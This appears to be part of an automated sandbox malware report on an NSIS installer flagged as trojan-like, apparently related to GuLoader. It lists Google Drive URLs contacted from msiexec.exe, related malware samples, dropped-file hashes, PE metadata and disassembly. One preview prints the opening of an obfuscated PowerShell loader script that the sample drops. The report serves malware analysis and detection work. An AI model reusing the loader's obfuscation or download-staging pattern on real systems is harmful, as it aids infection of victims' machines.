                                              https://drive.google.com/msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.google.com/twmsiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.google.com/$hmsiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://drive.usercontent.google.com/J~msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://apis.google.commsiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2633960829.0000000005011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                142.250.181.238
                                                                drive.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.185.225
                                                                drive.usercontent.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1588705
                                                                Start date and time:2025-01-11 04:32:45 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 55s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name:Run with higher sleep bypass
                                                                Number of analysed new started processes analysed:7
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:yMXFgPOdf2.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7.exe
                                                                Detection:MAL
                                                                Classification:mal96.troj.evad.winEXE@6/12@2/2
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 92%
                                                                • Number of executed functions: 70
                                                                • Number of non-executed functions: 45
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                No simulations
                                                                No context
                                                                No context
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                37f463bf4616ecd445d4a1937da06e192976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                                                                • 142.250.181.238
                                                                • 142.250.185.225
                                                                02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 142.250.181.238
                                                                • 142.250.185.225
                                                                LMSxhK1u8Z.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.238
                                                                • 142.250.185.225
                                                                ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.238
                                                                • 142.250.185.225
                                                                ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.238
                                                                • 142.250.185.225
                                                                4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • 142.250.181.238
                                                                • 142.250.185.225
                                                                ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 142.250.185.225
                                                                YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.238
                                                                • 142.250.185.225
                                                                4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • 142.250.181.238
                                                                • 142.250.185.225
                                                                No context
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):53158
                                                                Entropy (8bit):5.062687652912555
                                                                Encrypted:false
                                                                SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                MD5:5D430F1344CE89737902AEC47C61C930
                                                                SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):348907
                                                                Entropy (8bit):7.64923648165635
                                                                Encrypted:false
                                                                SSDEEP:6144:JhtZdbciFRH/0Mx7fRlSiK32RoFqpOXNBhknlKcwoMFW0wN:NjxF5xrRlFK32R0zm5woMFWH
                                                                MD5:000C4C2148C711E5D3CBEED4144C6F55
                                                                SHA1:E35927390A543BEE257AE0009701C57FF6704E55
                                                                SHA-256:8E75A4461FDBC1386345F6F9CCD0984FBB1799B92033F902B2F43EB6421B9E7E
                                                                SHA-512:613BB7929D5BEDF7A12C41553AD87B955C5EC6862E15DB03E776DC55B396A7D25CDA6E5F40319DE8896D108D1521AD4CC1D070ADEA91F2E4DFFE79ECBB5E654B
                                                                Malicious:false
                                                                Preview:...................|.....555..##.c.-.........e.............]].:::::::...mmm..................................^^.................HHHH.......FFFF.III....ff.........................TT....UU..nn..ssssss.............00000..a........I...--..'.??....~........m...RRR.!!..44.......*.00................((.6.............j..............-..............##.4.9.MM..........}}}.........=.............D............................::..mmmm.....jj.......a.............mm.........y.....................................................z......ee.9999999999.......................???...........I......./....................RRRR..z.....................................".((.........................@..................s..qqqqqq.;..@..............oooooo.tt....S.GGGG..a......c...............NN..l...........w.MM...YY.....................D..fffffff.\.....................88.....aa...PPP.......q.....Y.g...........................2.....>>........ee............[[[. .1...```...............T.................+++..GG............c.
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):389321
                                                                Entropy (8bit):1.2441456788113954
                                                                Encrypted:false
                                                                SSDEEP:1536:FeL5BK5C2PeeejgqyaJ5vizEyLZ/5DKMdt/v:ALXYcjBjJRioyLZ/vP
                                                                MD5:89E3C9CE687BCCD3DD422E9CF78E80E7
                                                                SHA1:007C57BDF5F5E6C0E5B711EBC7BABD673405868D
                                                                SHA-256:51F91F8B04620D371417A6A74162ABD8B690909C544F320338B874F3DDAC4BC2
                                                                SHA-512:2245F6FF3D25FF4142C8C2FB716C775F16592E33909EF9CBD61D2B4AB9891224D45AA58DE3861606DE97604BDD91C78F05BFEFA9A5E80F3272AEBEA6023B804D
                                                                Malicious:false
                                                                Preview:....O................................................<...7.K.......................\...........................................$............M......................................................................................................~...................q................................................................................w..............r...........................a...........................%......................l.......................................4.........+.............................................._.............................................................@..................................................................................#.....................Q....................M....................X....e..................lC.........,..............................a........C....1..............................[...................q...............................B.............................,.........U...................................................
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):353789
                                                                Entropy (8bit):1.2644758643056393
                                                                Encrypted:false
                                                                SSDEEP:768:13gkCATl4BkZKo0fUjjxFBEdCYm58mNplGQUxbgNcDr7A78Q0Ej8RTTzVs2zWjtq:d0AHnNm/pdYlHvnAYv
                                                                MD5:1389593C3437BAED25D4CD0C926898FF
                                                                SHA1:532BC681AF49B0BEAD471EBBA0AB0191E78A4E02
                                                                SHA-256:9A8D9ED596327751DB6960002DD258066E82BE64080C737D381708446BEB519E
                                                                SHA-512:C6DB96BAEA286B7281B1E068B78D5076F4EAE2DBEB01CAA43C59C29F1839F2328FB59ACE190EA8267790D726706E0F0234876F6ED665818EA0D1AE252DB18C57
                                                                Malicious:false
                                                                Preview:...............6........................R.N.......................................................^.......................................w.......................R..................................k.......................~.................U...................... s..................4........V............................<............h...........U...............................-...................................................e.................@.......-................................................[...............=...........................................N.....w..^.5.............+.............................................................................*...........................c...........................b.......................f............>....................+...................0_........................................@........^........._.........W........u............................................b...$...........}.........................9.~...........L.................
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Category:dropped
                                                                Size (bytes):554816
                                                                Entropy (8bit):7.967733280499974
                                                                Encrypted:false
                                                                SSDEEP:12288:aICfPgs7diA6gdZiygrNIVYAHHjMIyoS/B3FYA1YU:MZdL6AMxI+Aopz/lJv
                                                                MD5:54327A2F6C75BB2C549A5A98A462A588
                                                                SHA1:F65473FA075BEF32B55445D84CB8BFA4DA48AC79
                                                                SHA-256:C3463021D3069AE7AAD460707A950EB7B427A65C87F3D8E201B59CEBB886A1B7
                                                                SHA-512:88595FA0AF8AC0211145787CE0D0D3AFDFB396EDFCFCBAB16D4714FBFB1077A8EB8DF5EC6BD9AAEFD916611363DD7791C62CFABA24A571BD4279FFB93BB73866
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................b..........)2............@..................................................................................... ............................................................................................................text...l`.......b.................. ..`.rdata..`............f..............@..@.data................|..............@....ndata.......P...........................rsrc... ...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (4175), with CRLF, LF line terminators
                                                                Category:dropped
                                                                Size (bytes):72419
                                                                Entropy (8bit):5.202406314479258
                                                                Encrypted:false
                                                                SSDEEP:1536:5IvdS5j9pnCoq0dne+ScDJCnHEQNH48jf3Wv+DTUPStt+LLAfD:GvwDpnf1J4nHtYuf86PN7
                                                                MD5:5F7683B5FC367FB972FDAF8E80B65209
                                                                SHA1:A13FF69F57AF2E5AB471F513C8188437D6D2EE6C
                                                                SHA-256:4DD50C49D0122FC5E02AC8806E6F6ABACFA8A5F9E868355824665DD76FAD2959
                                                                SHA-512:D7B54E3E42C8EC494C6FDB69A4C7FB4D1C2A86229F5BDE05EF17A97BA5134AD5A063080E9638FF2C44FB730A2C8ED42A34268F5C8C61C86E15E87D272C03C621
                                                                Malicious:false
                                                                Preview:$Radikandernes=$Signifikansniveauerneslindtarmsoperationer;.....<#Irradiates Inoculum Cacodaemon Endosperm Etiopisk Hoejreparenteser #>..<#saccharometres Abusious Dragers Ufredeligheds Gyngende Historial #>..<#Pseudoparallel Musicerendes Radikalisere Zygodont Smedesvenden #>..<#Svedkirtels Spinomuscular fuga Bygningattester Sculptitory Phthiriasis Nstmest #>..<#Uroliths Rkerivalen Epileptically Textilist transferrins #>..<#Wooziness cupeller Undoings Opretningernes Fordomsfries monsuners #>...$Fyrrekoglerne = @'.Uri ome. Normsy$AsherytRGravernt Fstemne Panuelbskdefral sebaroAccrescmJ.wliessTilsendtanom,idr Pindsve issekrtSknkeprsHematin=Superpl$TwirlieJ.seudoptP intert S,ilemeDaduchusAarsungtTresindu ekanise UndularEnkemannAfst esesekretisFemkmp ;wightaf.Embr onfSucceeduLucratin BaglygcUr nstitramseybiSor.imeoK mmerhnPuff.et OverfesA Hovedbs FunktikStraahaa fran,urSliwe ciAcumblesFlorsuk Phrasab(Indiane$BlendenFB vislirSapiostdIndsigtsNyisma.eBotan zlLocutorsBoulevalRacallaoSuccussv
                                                                Process:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):123589
                                                                Entropy (8bit):1.2483073164392806
                                                                Encrypted:false
                                                                SSDEEP:768:m1KHXfm5rQX+j8EqstsDz8z/nFdKur6NmZSqC+uioeefzpB:6KuTUst73XQTdFB
                                                                MD5:C8E4A04215D6E7A2A46B2ECF556E8034
                                                                SHA1:EC0CF162AFCCFC3EE67BEEF117DB801EAE87095A
                                                                SHA-256:AB50D30AFE30A2B1E868A29CA803681B1A5C0182A1BA8A68E1F7F41C241CFAC2
                                                                SHA-512:8FA144195FEDEB75D2E874AE4A35E667E366F805BE91D0AF79309FAEEA2857668FBFC4EC31F2CE85FF40BC197802F0E2EBEAF8C07AF12D4782A5B8A09792558E
                                                                Malicious:false
                                                                Preview:.....".............................................................................................................0...........2...............'..[.......[..............B....................'......'.q............2...............".............h..................&.................J...........................$@.....................W............................................h...........................................!...........k...................2..............%..............................................U....................(......................................................N.......................................=.........................}...................................W......T......................|....................................................................................-..................................................................#....................................................................<...............'.................~........n........P...
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.967733280499974
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:yMXFgPOdf2.exe
                                                                File size:554'816 bytes
                                                                MD5:54327a2f6c75bb2c549a5a98a462a588
                                                                SHA1:f65473fa075bef32b55445d84cb8bfa4da48ac79
                                                                SHA256:c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7
                                                                SHA512:88595fa0af8ac0211145787ce0d0d3afdfb396edfcfcbab16d4714fbfb1077a8eb8df5ec6bd9aaefd916611363dd7791c62cfaba24a571bd4279ffb93bb73866
                                                                SSDEEP:12288:aICfPgs7diA6gdZiygrNIVYAHHjMIyoS/B3FYA1YU:MZdL6AMxI+Aopz/lJv
                                                                TLSH:A3C4231241A3D227D6B20B32257375438A55D13CB42A674A0BD4A52FFF1FB877A2B317
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................b..........)2............@
                                                                Icon Hash:3d2e0f95332b3399
                                                                Entrypoint:0x403229
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x52BA66B8 [Wed Dec 25 05:01:44 2013 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:7ed0d71376e55d58ab36dc7d3ffda898
                                                                Instruction
                                                                sub esp, 000002D4h
                                                                push ebx
                                                                push ebp
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                xor ebp, ebp
                                                                pop esi
                                                                mov dword ptr [esp+14h], ebp
                                                                mov dword ptr [esp+10h], 0040A2D8h
                                                                mov dword ptr [esp+1Ch], ebp
                                                                call dword ptr [00408034h]
                                                                push 00008001h
                                                                call dword ptr [00408134h]
                                                                push ebp
                                                                call dword ptr [004082ACh]
                                                                push 00000008h
                                                                mov dword ptr [00434F58h], eax
                                                                call 00007F76F8BE0904h
                                                                mov dword ptr [00434EA4h], eax
                                                                push ebp
                                                                lea eax, dword ptr [esp+34h]
                                                                push 000002B4h
                                                                push eax
                                                                push ebp
                                                                push 0042B1B8h
                                                                call dword ptr [0040817Ch]
                                                                push 0040A2C0h
                                                                push 00433EA0h
                                                                call 00007F76F8BE056Fh
                                                                call dword ptr [00408138h]
                                                                mov ebx, 0043F000h
                                                                push eax
                                                                push ebx
                                                                call 00007F76F8BE055Dh
                                                                push ebp
                                                                call dword ptr [0040810Ch]
                                                                cmp word ptr [0043F000h], 0022h
                                                                mov dword ptr [00434EA0h], eax
                                                                mov eax, ebx
                                                                jne 00007F76F8BDDA6Ah
                                                                push 00000022h
                                                                mov eax, 0043F002h
                                                                pop esi
                                                                push esi
                                                                push eax
                                                                call 00007F76F8BDFFAEh
                                                                push eax
                                                                call dword ptr [00408240h]
                                                                mov dword ptr [esp+18h], eax
                                                                jmp 00007F76F8BDDB2Eh
                                                                push 00000020h
                                                                pop edx
                                                                cmp cx, dx
                                                                jne 00007F76F8BDDA69h
                                                                inc eax
                                                                inc eax
                                                                cmp word ptr [eax], dx
                                                                je 00007F76F8BDDA5Bh
                                                                add word ptr [eax], 0000h
                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85a00xb4.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000xe20.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x606c0x62006b261bd7f45c2df7de2d0134c84421b7False0.6672114158163265data6.457067985385169IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x80000x14600x16000aa2dc336f7337ed3785ee2afeacae36False0.4211647727272727data4.945964880166059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xa0000x2af980x600326f796323fdc724ea91090eafbe9bdcFalse0.4856770833333333data3.795352750027872IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x350000x1a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x4f0000xe200x1000e5e5702e0860c5a23b57f4e4a3a48c73False0.39404296875data3.933821454129907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x4f2080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
